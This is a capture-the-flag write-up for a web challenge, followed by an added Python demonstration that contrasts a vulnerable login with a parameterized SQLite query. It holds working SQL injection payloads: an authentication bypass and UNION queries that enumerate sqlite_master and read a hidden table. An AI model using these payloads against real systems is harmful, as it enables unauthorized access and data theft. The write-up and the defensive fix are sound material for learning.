You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points.
Here is your challenge: https://ctf.fluxfingers.net:1315/
Submitting the form didn't prove useful:
    User-agent: WallE
    Disallow: /
    # Keep em' away
    User-agent: *
    Disallow: /vault
So to the vault we go! Now we are faced with a basic HTTP authentication scheme requesting a username and password. No hints were given about what should be done here, but inserting an SQL injection gave Internal Error 500, which should mean we broke the SQL statement. Using
    ' or '1'='1
we could bypass the login system and enter the vault.
Using @@version or version() in the query didn't work, so the database wasn't MySQL. It could be SQLite, in which case we could use the sqlite_master table to find the table names in the database.
    1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' ORDER BY name DESC LIMIT 1 --
Gave us 'users'
    1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' AND name!='users' ORDER BY name DESC LIMIT 1 --
Gave us 'sqlite_sequence'
    1' OR 1=1 UNION ALL SELECT name FROM sqlite_master WHERE type='table' AND name!='users' AND name!='sqlite_sequence' ORDER BY name DESC LIMIT 1 --
Gave us 'hiddensecrets'
    1' OR 1=1 UNION ALL SELECT sql FROM sqlite_master WHERE tbl_name='hiddensecrets' ORDER BY name ASC LIMIT 1 --
    1' OR 1=1 UNION ALL SELECT val FROM hiddensecrets WHERE hiddensecrets.id=1 ORDER BY name DESC LIMIT 1 --
This gives us a base64-encoded PNG image which, after decoding, gives us the blurry secret:
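Why the payloads above worked, and the fix that stops them, as an added example that is not the challenge's own code: a login check that splices credentials into the SQL text is run beside a parameterized one against an in-memory SQLite database. The query shape, column names, rows and the choice of the password field as the injection point are assumptions; only the table names and the payload strings come from the write-up.

```python
import sqlite3

# Payloads quoted from the write-up; everything else here is constructed.
PAYLOADS = [
    "'",
    "' or '1'='1",
    "1' OR 1=1 UNION ALL SELECT name FROM sqlite_master "
    "WHERE type='table' ORDER BY name DESC LIMIT 1 --",
]

def make_db():
    # Table names follow the write-up; columns and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,
                            name TEXT, password TEXT);
        CREATE TABLE hiddensecrets (id INTEGER PRIMARY KEY AUTOINCREMENT,
                                    val TEXT);
        INSERT INTO users (name, password) VALUES ('admin', 'constructed-pw');
        INSERT INTO hiddensecrets (val) VALUES ('constructed-secret');
    """)
    return db

def login_vulnerable(db, user, password):
    # Credentials are spliced into the SQL text, so a quote rewrites the query.
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (user, password))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "HTTP 500"  # broken statement, as observed in the write-up
    return row[0] if row else None

def login_safe(db, user, password):
    # Bound parameters are always treated as data, never as SQL.
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None

def compare(db):
    # (vulnerable result, parameterized result) for each payload as password.
    return [(login_vulnerable(db, "x", p), login_safe(db, "x", p))
            for p in PAYLOADS]

if __name__ == "__main__":
    for payload, result in zip(PAYLOADS, compare(make_db())):
        print(repr(payload), "->", result)
```

With bound parameters every payload is compared as a literal password and the login simply fails, so neither the 500 error nor the sqlite_master enumeration is reachable.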